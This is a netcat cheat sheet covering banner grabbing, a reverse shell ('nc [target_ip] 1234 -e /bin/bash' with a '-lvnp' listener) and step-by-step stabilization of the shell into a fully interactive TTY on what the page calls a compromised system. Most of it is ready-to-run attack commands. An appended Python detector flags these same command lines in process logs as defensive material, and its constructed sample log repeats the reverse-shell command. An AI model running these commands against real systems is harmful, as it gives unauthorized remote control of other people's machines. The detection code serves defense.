Netcat - Advanced
Usage and Examples
Using netcat for banner grabbing
nc 192.168.1.1 80
Reverse shell with netcat
On listener's machine:
nc -lvnp 1234
(The -lvnp options specify listening verbosely on the given port with no name resolution)
On target machine:
nc [target_ip] 1234 -e /bin/bash
(Specifying -e /bin/bash is optional.)
Stabilizing Netcat
By default, Netcat shells are often unstable and lack features like command history, tab completion, and proper terminal handling. Stabilizing the shell transforms it into a more robust, interactive session, which improves its reliability and enhances control over the compromised system.
Methods for Netcat Shell Stabilization
Using rlwrap
Steps:
1. Install rlwrap on your local machine if not installed
sudo apt-get install rlwrap
2. Use the netcat command with rlwrap
rlwrap nc -lvnp 4444
Background the shell with Ctrl + Z.
Re-enter the shell:
stty raw -echo; fg
Upgrading to fully interactive TTY
Use python:
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
stty raw -echo; fg
Setting terminal variables
Steps:
Background the netcat shell
Use the command CTRL + Z.
Set terminal type
stty raw -echo; fg
Export terminal variables
reset
export SHELL=bash
export TERM=xterm
stty rows [number] columns [number]
(Replace [number] with the appropriate values for your terminal size)
Overview of Netcat Shell stabilization
Step 1:
Use Python to spawn a better-featured bash shell, which will make our shell look a bit prettier.
python3 -c 'import pty;pty.spawn("/bin/bash")'
We still won’t be able to use tab autocomplete or the arrow keys.
Step 2:
Get access to term commands such as clear.
export TERM=xterm
Step 3:
Now, background the shell.
Ctrl + Z
Step 4:
Use the following back in the normal terminal:
stty raw -echo; fg
This does two things: first, it turns off our own terminal echo, which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes; second, fg brings the backgrounded shell back to the foreground.
Step 5:
Finally, correct the distorted rows and columns of the terminal in which we type commands.
stty rows 38 columns 116
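Seen from the defender's side, the commands on this page leave distinctive process command lines. The following added example (not part of the original page) flags them in process-execution logs; the log layout, finding names and sample lines are constructed assumptions.

```python
import re
import shlex

NETCAT = {"nc", "ncat", "netcat"}
SHELLS = {"sh", "bash", "dash", "zsh"}
LINE = re.compile(r"host=(?P<host>\S+) user=(?P<user>\S+) cmd=(?P<cmd>.+)$")

def short_flags(argv):
    """Collect single-dash flag letters, so '-lvnp' yields l, v, n, p."""
    return {ch for a in argv if re.fullmatch(r"-[A-Za-z]+", a) for ch in a[1:]}

def classify(cmd):
    """Return the set of findings for one process command line."""
    try:
        argv = shlex.split(cmd)
    except ValueError:  # unbalanced quotes: fall back to whitespace split
        argv = cmd.split()
    names = [a.rsplit("/", 1)[-1] for a in argv]  # basename of every token
    findings = set()
    if names and names[0] == "rlwrap":  # wrapper only; inspect what it runs
        findings.add("rlwrap_wrapper")
        argv, names = argv[1:], names[1:]
    if names and names[0] in NETCAT:
        flags = short_flags(argv[1:])
        if "l" in flags:
            findings.add("netcat_listener")
        # -e hands the socket to a program; a shell there is the page's reverse shell
        if "e" in flags and any(n in SHELLS for n in names[1:]):
            findings.add("netcat_exec_shell")
    if names and names[0].startswith("python") and "pty.spawn" in cmd:
        findings.add("pty_spawn_upgrade")
    return findings

def scan(lines):
    """Return (host, user, sorted findings) for each log line that matches."""
    hits = ((m["host"], m["user"], sorted(classify(m["cmd"])))
            for m in filter(None, map(LINE.search, lines)))
    return [h for h in hits if h[2]]

# Constructed sample lines in an assumed "host= user= cmd=" layout (TEST-NET addresses).
SAMPLE = [
    "2024-05-01T10:00:01Z host=web01 user=www-data cmd=nc 192.0.2.10 1234 -e /bin/bash",
    "2024-05-01T10:00:05Z host=web01 user=www-data cmd=python3 -c 'import pty; pty.spawn(\"/bin/bash\")'",
    "2024-05-01T10:02:00Z host=jump01 user=alice cmd=rlwrap nc -lvnp 4444",
    "2024-05-01T10:03:00Z host=db01 user=backup cmd=nc -zv 192.0.2.20 5432",
]

if __name__ == "__main__":
    print(*scan(SAMPLE), sep="\n")
```

Command-line matching is only one signal; correlate hits with outbound connection telemetry for the same host and time.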